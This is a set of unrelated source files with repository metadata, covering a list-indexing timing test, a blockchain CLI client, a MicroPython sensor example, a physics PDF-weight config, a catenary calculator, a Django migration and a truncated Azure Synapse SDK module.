| 0
| null | 2019-10-08T17:57:35
| 2019-10-08T17:42:15
| null |
UTF-8
|
Python
| false
| false
| 765
|
py
|
import random
import timeit
exampleList = list(range(10000))
num = 10000
def bigOForListIndex(exampleList, n):
"""
Experiment to verify list index is O(1)
"""
for i in range(num):
index = random.randint(0, num-1)
exampleList[index]
def main():
for n in range(1000000, 10000001, 1000000):
exampleList = list(range(n))
indexTime = timeit.Timer("bigOForListIndex(exampleList,"+str(n)+")",
"from __main__ import exampleList,\
bigOForListIndex")
it = indexTime.timeit(number=1)
print ("Length of time for %d index access in %d list of"\
"numbers :%15.9f seconds" % (num, n, it))
if __name__ == '__main__':
main()
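# Interpretation note (added): because list indexing is O(1), the reported time
# should stay roughly constant as the list length n grows, since every run
# performs the same number (num) of random accesses.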
|
[
"ventrellajoe1@gmail.com"
] |
ventrellajoe1@gmail.com
|
748f97751e80a2258b78d59ce4a378db9a54d1b5
|
b743a6b89e3e7628963fd06d2928b8d1cdc3243c
|
/bpl_client/Client.py
|
c9143098c648f30df369d458d22b99d0e6d61a3a
|
[
"MIT"
] |
permissive
|
DuneRoot/bpl-cli
|
847248d36449181856e6cf34a18119cd9fc1b045
|
3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28
|
refs/heads/master
| 2020-03-25T17:42:06.339501
| 2019-02-20T19:20:26
| 2019-02-20T19:20:26
| 143,990,801
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,781
|
py
|
"""
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
def __init__(self):
"""
Client Class.
Retrieves options from docopt. Options are then filtered using data stored in commands.json.
Command is then imported and instantiated.
"""
self._options = docopt(__doc__, version=__version__)
self._arguments = {
k: v for k, v in self._options.items()
if not isinstance(v, bool)
}
commands_json = json.loads(read_file(COMMANDS_JSON))
command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
getattr(
import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
command["Class Identifier"]
)(self._arguments).run()
def _is_command(self, conditions):
return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
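# Illustrative note (added; an assumption about docopt's output, not original code):
# for "bpl-cli account create", docopt marks the words "account" and "create" as
# True in self._options, so _is_command(["account", "create"]) computes
# reduce(lambda x, y: x and y, [True, True]) == True and that commands.json
# entry is selected.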
|
[
"johnyob132@gmail.com"
] |
johnyob132@gmail.com
|
cdf669514aaf2c1d7c33248746135d7b0232f29f
|
184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1
|
/library/aht10/aht10_example.py
|
46df77a8a71666025fda1409a3c5b7ebdbed9497
|
[] |
no_license
|
RT-Thread/mpy-snippets
|
fdd257bb9f44cdc92e52cd39cdc88a57d736fb26
|
9296d559da275f51845cb9c2f8e2010f66f72cc1
|
refs/heads/master
| 2023-06-14T02:20:05.449559
| 2020-06-03T02:34:47
| 2020-06-03T02:35:19
| 198,854,793
| 28
| 18
| null | 2020-05-06T11:32:46
| 2019-07-25T15:14:56
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33 # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line
i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
|
[
"SummerGift@qq.com"
] |
SummerGift@qq.com
|
7efbf28a97b17e623a9be0e1d817befa061257fc
|
fe061550aa4a6d894aba6fc91ec3f4a9c276ee5d
|
/ALCARAW_RECO/python/pdfSystematics_cff.py
|
25c61242fc5df1a2a7699333ce47b47e4d7cdd91
|
[] |
no_license
|
ldcorpe/ECALELF
|
0f11c04c63cd4ef9c0fac9168d827c8b4d99eada
|
6f8196c6c455b9ff092007ea5d0e69fc6e68a517
|
refs/heads/master
| 2020-12-30T22:08:58.160533
| 2014-03-05T09:35:07
| 2014-03-05T09:35:07
| 17,245,358
| 0
| 0
| null | 2015-07-23T17:14:56
| 2014-02-27T10:37:42
|
C++
|
UTF-8
|
Python
| false
| false
| 727
|
py
|
import FWCore.ParameterSet.Config as cms
# Produce PDF weights (maximum is 3)
pdfWeights = cms.EDProducer("PdfWeightProducer",
# Fix POWHEG if buggy (this PDF set will also appear on output,
# so only two more PDF sets can be added in PdfSetNames if not "")
#FixPOWHEG = cms.untracked.string("cteq66.LHgrid"),
#GenTag = cms.untracked.InputTag("genParticles"),
PdfInfoTag = cms.untracked.InputTag("generator"),
PdfSetNames = cms.untracked.vstring(
"cteq66.LHgrid"
, "MRST2006nnlo.LHgrid"
, "NNPDF10_100.LHgrid"
)
)
|
[
"shervin@cern.ch"
] |
shervin@cern.ch
|
11b5246e31e2f5ef8ad5e9bcb8fdfabe438a1953
|
6defd2219720396842ac564e7d6bf4f5146eddda
|
/pycatenary.py
|
0918a0110a0feec62435cf74110d084ab14fdc9e
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
fsanges/pyCatenary-NoElast
|
2e111d379d36582b6b1851d4e4eb2bc004f4dc25
|
5901b06a208b802f12990ca0ecdce8c975c4a0e5
|
refs/heads/master
| 2021-12-01T20:55:56.685777
| 2013-04-01T11:46:34
| 2013-04-01T11:46:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,660
|
py
|
#!/usr/bin/env python
# catenary calculation, re-written in python - NO Elasticity!!!
import math
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import fsolve
from inout import write_file
def cat(a):
# defining catenary function
#catenary eq (math): a*sinh(L/(2*a)+atanh(d/S))+a*sinh(L/(2*a)-atanh(d/S))-S=0
return a*math.sinh(L/(2*a)+math.atanh(d/S))+a*math.sinh(L/(2*a)-math.atanh(d/S))-S
L=float(input("Horizontal Distance between supports [m]: "))
d=float(input ("Vertical Distance between supports [m]: "))
S=float(input("Length of cable [m] - must be greater than distance between supports: "))
w=float(input("Unit weight of cable [kg/m]: "))
za=float(input("Elevation of higher support from reference plane [m]: "))
#checking if cable length is bigger than total distance between supports
distance=(L**2+d**2)**0.5
if S <= distance:
print ("Length of cable must be greater than TOTAL distance between supports!")
S=float(input("Length of cable [m]: "))
else:
pass
# solving catenary function for 'a'
a=fsolve(cat, 1)
# hor. distance between lowest catenary point (P) to higher support point (La)
La=a*(L/(2*a)+math.atanh(d/S))
# hor. distance between lowest catenary point (P) to lower support point (Lb)
Lb=L-La
# vert. distance from higher support point to lowest point (P) in catenary (ha)
ha=a*math.cosh(La/a)-a
## calculating reaction forces and angles
# catenary lenght between support "A" (higher) and "P" - Sa
Sa=a*math.sinh(La/a)
# catenary lenght between support "B" )lower) and "P" - Sb
Sb=a*math.sinh(Lb/a)
# horizontal tension - constant through catenary: H
H=w*a
# vertical tension at "A" (Va) and "B" (Vb)
Va=Sa*w
Vb=Sb*w
# tension at "A" (TA) and B (TB)
TA=(H**2+Va**2)**0.5
TB=(H**2+Vb**2)**0.5
# inclination angles from vertical at "A" (ThetA) and B (ThetB)
ThetA=math.atan(H/Va)
ThetB=math.atan(H/Vb)
ThetAd=ThetA*180/math.pi;
ThetBd=ThetB*180/math.pi;
# establishing A, B and P in coordinate system
# index "a" corresponding to point "A", "b" to "B"-point and "P" to lowest caten. point
zb=za-d
zp=za-ha
xa=La
xp=0
xb=-Lb
# writing results to file
fname='catenary_res.txt'
fn=open(fname, 'a')
write_file(fn, "Horizontal Distance between supports in meters: ", round(L,3))
write_file(fn, "Catenary length in meters: ", round(S,3))
write_file(fn, "Vertical Distance Between supports in meters: ", round(d,3))
write_file(fn, "Unit Weight of Catenary line in kg/m: ", round(w,3))
write_file(fn, "Elevation of higher support (A) from reference plane in meters: ", round(za,3))
write_file(fn, "\Catenary coef.: ", round(a,5))
write_file(fn, "Horizontal tension in kg (constant along line: ", round(H,3))
write_file(fn, "Vertical tension in A in kg: ", round(Va,3))
write_file(fn, "Total tension in A in kg: ", round(TA,3))
write_file(fn, "Total tension in B in kg: ", round(TB,3))
write_file(fn, "Inclination angle from vertical at A in radians: ", round(ThetA,3))
write_file(fn, "Inclination angle from vertical at B in radians: ", round(ThetB,3))
write_file(fn, "Inclination angle from vertical at A in degrees: ", round(ThetAd,3))
write_file(fn, "Inclination angle from vertical at B in degrees: ", round(ThetBd,3))
fn.close()
# graphing catenary curve - matplotlib & writing coordinates to file
xinc=L/100
y=[]
xc=[]
fncoords="catenary_coords.txt"
fn=open(fncoords, "a")
for x in np.arange (xb, xa+xinc, xinc):
ycal=a*math.cosh(x/a)
fn.write("\n")
fn.write(str(round(x,3)))
fn.write("\t")
fn.write(str(round(ycal[0],3)))
y.append(ycal)
xc.append(x)
fn.close()
# plotting, finally
plt.plot(xc,y)
plt.xlabel("X-distance [m]")
plt.ylabel("Y-distance [m]")
plt.grid()
plt.show()
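# Optional sanity checks (added; they use only quantities computed above). With
# the catenary coefficient 'a' solved correctly, the two arc lengths recombine
# to the cable length and the sag difference matches the support offset:
# print("Sa + Sb - S =", Sa + Sb - S)                                # ~ 0
# print("a*cosh(La/a) - a*cosh(Lb/a) - d =",
#       a * math.cosh(La / a) - a * math.cosh(Lb / a) - d)           # ~ 0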
|
[
"deki.djokic@gmail.com"
] |
deki.djokic@gmail.com
|
7f7434016d940893c9cb3b72ea218d424554329e
|
ea416617fdf6632081cb91fccfb2e8fa5965ad9e
|
/plan/migrations/0002_route.py
|
f4cf7c2b4ef825c3680cda2b86819c90200f91f0
|
[] |
no_license
|
fergalpowell/final_year_project
|
249f8289ab84b5daba98a9f262e1a2637760cd49
|
568e8cb646ccf5b6a25c1368ffd2204d7d5f08ab
|
refs/heads/master
| 2021-09-13T17:29:26.868935
| 2018-05-02T15:03:14
| 2018-05-02T15:03:14
| 112,532,473
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 698
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 11:22
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('plan', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Route',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('route', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
('name', models.CharField(max_length=250)),
],
),
]
|
[
"fergal.powell@gmail.com"
] |
fergal.powell@gmail.com
|
90352a180e75d18219b8cba394d4d2b8f03de187
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/synapse/azure-synapse-artifacts/azure/synapse/artifacts/operations/_spark_configuration_operations.py
|
9d5b1194a4b1cae79ac490bbe3402239b826e729
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 33,298
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.polling.base_polling import LROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_spark_configurations_by_workspace_request(**kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations")
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_spark_configuration_request(
spark_configuration_name: str, *, if_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_match is not None:
_headers["If-Match"] = _SERIALIZER.header("if_match", if_match, "str")
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_spark_configuration_request(
spark_configuration_name: str, *, if_none_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_none_match is not None:
_headers["If-None-Match"] = _SERIALIZER.header("if_none_match", if_none_match, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_rename_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}/rename")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class SparkConfigurationOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.synapse.artifacts.ArtifactsClient`'s
:attr:`spark_configuration` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get_spark_configurations_by_workspace(self, **kwargs: Any) -> Iterable["_models.SparkConfigurationResource"]:
"""Lists sparkconfigurations.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SparkConfigurationResource or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.SparkConfigurationListResponse] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_spark_configurations_by_workspace_request(
api_version=api_version,
template_url=self.get_spark_configurations_by_workspace.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SparkConfigurationListResponse", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return ItemPaged(get_next, extract_data)
get_spark_configurations_by_workspace.metadata = {"url": "/sparkconfigurations"}
def _create_or_update_spark_configuration_initial(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
_spark_configuration = _models.SparkConfigurationResource(properties=properties)
_json = self._serialize.body(_spark_configuration, "SparkConfigurationResource")
request = build_create_or_update_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_match=if_match,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_create_or_update_spark_configuration(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> LROPoller[_models.SparkConfigurationResource]:
"""Creates or updates a sparkconfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param properties: Properties of Spark Configuration. Required.
:type properties: ~azure.synapse.artifacts.models.SparkConfiguration
:param if_match: ETag of the sparkConfiguration entity. Should only be specified for update,
for which it should match existing entity or can be * for unconditional update. Default value
is None.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either SparkConfigurationResource or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[_models.SparkConfigurationResource] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_spark_configuration_initial(
spark_configuration_name=spark_configuration_name,
properties=properties,
if_match=if_match,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def get_spark_configuration(
self, spark_configuration_name: str, if_none_match: Optional[str] = None, **kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
"""Gets a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param if_none_match: ETag of the sparkConfiguration entity. Should only be specified for get.
If the ETag matches the existing entity tag, or if * was provided, then no content will be
returned. Default value is None.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SparkConfigurationResource or None or the result of cls(response)
:rtype: ~azure.synapse.artifacts.models.SparkConfigurationResource or None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
request = build_get_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_none_match=if_none_match,
api_version=api_version,
template_url=self.get_spark_configuration.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 304]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _delete_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
template_url=self._delete_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_delete_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_delete_spark_configuration(self, spark_configuration_name: str, **kwargs: Any) -> LROPoller[None]:
"""Deletes a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
